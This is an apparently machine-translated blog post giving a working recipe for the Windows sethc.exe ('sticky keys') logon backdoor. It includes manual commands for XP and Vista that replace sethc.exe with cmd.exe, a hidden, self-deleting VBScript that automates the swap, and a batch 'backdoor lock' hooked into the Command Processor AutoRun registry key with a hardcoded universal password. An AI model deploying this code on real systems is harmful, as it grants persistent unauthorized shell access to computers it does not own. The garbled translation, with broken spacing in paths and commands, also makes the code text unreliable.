This is a history of the coolest Windows Background sethc.exe.

Backdoor principle:

In Windows 2000/XP/vista, you can press the shiftkey 5 times to enable the plug-in and run sethc.exe. In addition, it can be opened on the logon interface. This makes people think of Windows screensaverProgramReplace with cmd.exe to open the shell.

XP:

Pop up the installation source disc (or rename the installation directory on the hard disk)
Cd % widnir % \ System32 \ dllcache
Ren sethc.exe *. ex ~
Cd % widnir % \ system32
Copy/y cmd.exe sethc.exe

Vista:

Takeown/f c: \ windows \ system32 \ sethc.exe
Cacls c: \ windows \ system32 \ sethc.exe/g administrator: F
Then replace the file with XP.

Press shift 5 on the logon page, run cmd shell, and then ......

backdoor Extension: copy Code the code is as follows: dim OBJ, success
set OBJ = Createobject ("wscript. shell ")
success = obj. run ("CMD/C takeown/F % SystemRoot % \ system32 \ sethc.exe", 0, true)
success = obj. run ("CMD/C echo y | cacls % SystemRoot % \ system32 \ sethc.exe/g % username %: F", 0, true)
success = obj. run ("CMD/C copy % SystemRoot % \ system32 \ cmd.exe % SystemRoot % \ system32 \ acmd.exe", 0, true)
success = obj. run ("CMD/C copy % SystemRoot % \ system32 \ sethc.exe % SystemRoot % \ system32 \ asethc.exe", 0, true)
success = obj. run ("CMD/C del % SystemRoot % \ system32 \ sethc.exe", 0, true)
success = obj. run ("CMD/C Ren % SystemRoot % \ system32 \ acmd.exe sethc.exe", 0, true)

The second sentence is the most interesting. automatic response... has encountered similar problems before.
Update again. Add a self-deletion to simplify the code...Copy codeThe Code is as follows: on error resume next
Dim OBJ, success
Set OBJ = Createobject ("wscript. Shell ")
Success = obj. run ("CMD/C takeown/F % SystemRoot % \ system32 \ sethc.exe & Echo y | cacls % SystemRoot % \ system32 \ sethc.exe/g % username %: F & copy % SystemRoot % \ system32 \ cmd.exe % SystemRoot % \ system32 \ acmd.exe & copy % SystemRoot % \ system32 \ sethc.exe % SystemRoot % \ system32 \ asethc.exe & del % SystemRoot % \ system32 \ sethc.exe & Ren % SystemRoot % \ system32 \ acmd.exe sethc.exe ", 0, true)
Createobject ("scripting. FileSystemObject"). deletefile (wscript. scriptname)

Extension of the rear door lock:
Allyesno Note: The cmd lock can be used to verify the password of the shell.
The following method of locking the rear door is to save the code as bdlock. bat.
Modify the Registry location.Copy codeThe Code is as follows: [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ command processor]
"Autorun" = "bdlock. Bat"

@ Echo off
Title backdoor login verification
Color
CLS
Set temprandom = % random %
Enter the verification code for ECHO: % temprandom %
Set/P check =
If "% check %" = "% temprandom %" Goto passcheck
If "% check %" = "% temprandom % "(
Rem backdoor server Verification
Rem if there is no backdoor verification server, please comment out the next line of code.
If exist \ 192.168.8.8 \ backdoor $ \ Pass goto passcheck
)
Echo Verification Failed
Pause
Exit
: Passcheck
Echo Verification Successful
If "% passcmdlock %" = "http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock = http://blog.csdn.net/freexploit/
: Allyesno
Set errorlevel => NUL
Echo, enter the verification password?
Set Password = allyesno is a pig> NUL
Set/P Password =
Rem universal password
If "% password %" = "allyesno is a Sb" Goto endx
If % time :~ 1, 1% = 0 set timechange =
If % time :~ 1, 1% = 1 Set timechange = B
If % time :~ 1, 1% = 2 set timechange = C
If % time :~ 1, 1% = 3 set timechange = d
If % time :~ 1, 1% = 4 set timechange = E
If % time :~ 1, 1% = 5 set timechange = f
If % time :~ 1, 1% = 6 set timechange = G
If % time :~ 1, 1% = 7 set timechange = H
If % time :~ 1, 1% = 8 set timechange = I
If % time :~ 1, 1% = 9 set timechange = J
Set/a sum = % time :~ 1, 1% + % time :~ 1, 1%
Set Password | findstr "^ Password = % timechange % time :~ 1, 1% % Date :~ 8, 2% % sum % $ "> NUL
If "% errorlevel %" = "0" CLS & Echo: the password is correct & goto end
Echo, please contact our Customer Service for correct password! & Goto allyesno
: End
Set Password => NUL
Set errorlevel => NUL
Echo

: Endx